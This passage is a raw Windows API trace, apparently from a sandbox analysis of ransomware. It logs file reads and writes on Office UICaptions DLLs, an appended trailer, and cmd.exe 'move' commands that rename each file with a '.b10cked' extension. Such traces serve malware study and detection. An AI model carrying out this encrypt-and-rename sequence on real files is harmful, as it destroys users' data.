lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x5ab60 [0158.175] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x5ab60 [0158.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x5ab60 [0158.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x5ab60 [0158.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x5ab60 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x5ab60 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x5ab60 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x5ab60 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x5ab60 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x5a678 [0158.178] ReadFile 
(in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0158.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0158.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0158.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x5ab60 [0158.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0158.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0158.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0158.422] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x5ab60 [0158.422] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0158.422] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0158.422] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0158.451] ReadFile (in: hFile=0x114, 
lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0158.474] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0158.493] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0158.493] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0158.493] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0158.494] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0158.494] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x3ab60 [0158.494] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0158.507] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0158.508] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, 
nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0158.509] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x3ab60 [0158.509] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0158.509] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0158.509] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0158.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUBWZINT.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0158.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUBWZINT.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x1328744, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBWZINT.REST.trx_dll", lpUsedDefaultChar=0x0) returned 21 [0158.513] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x5ab60 [0158.513] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, 
lpOverlapped=0x0) returned 1 [0158.514] CloseHandle (hObject=0x114) returned 1 [0158.566] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX") returned 0x3c [0158.567] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0158.568] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x3c4, dwThreadId=0xff4)) returned 1 [0158.570] CloseHandle (hObject=0x1b4) returned 1 [0158.570] CloseHandle (hObject=0x114) returned 1 [0158.570] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0158.570] 
CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0158.570] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0158.570] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.570] ReleaseMutex (hMutex=0xf8) returned 1 [0158.570] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.570] ReleaseMutex (hMutex=0xf8) returned 1 [0158.570] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.570] ReleaseMutex (hMutex=0xf8) returned 1 [0158.570] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.570] ReleaseMutex (hMutex=0xf8) returned 1 [0158.570] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0158.571] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.571] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.572] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21536084280) returned 1 [0158.572] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3360 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.572] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x2e78 [0158.573] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0158.641] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0158.642] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0158.642] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3360 [0158.642] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0158.642] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0158.642] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0158.642] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3360 [0158.642] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0158.642] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0158.642] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x19af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x19af, lpOverlapped=0x0) returned 1 [0158.656] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0158.656] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x19af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x19af, lpOverlapped=0x0) returned 1 [0158.656] SetFilePointer (in: hFile=0x114, lDistanceToMove=-6575, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x19b1 [0158.656] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x19af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x19af, lpOverlapped=0x0) returned 1 [0158.657] SetFilePointer (in: hFile=0x114, lDistanceToMove=-6575, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x19b1 [0158.657] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x19af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x19af, lpOverlapped=0x0) 
returned 1 [0158.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SGRES.DLL.trx_dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0158.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SGRES.DLL.trx_dll", cchWideChar=17, lpMultiByteStr=0x1328744, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SGRES.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 17 [0158.662] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3360 [0158.662] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0158.662] CloseHandle (hObject=0x114) returned 1 [0158.663] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: 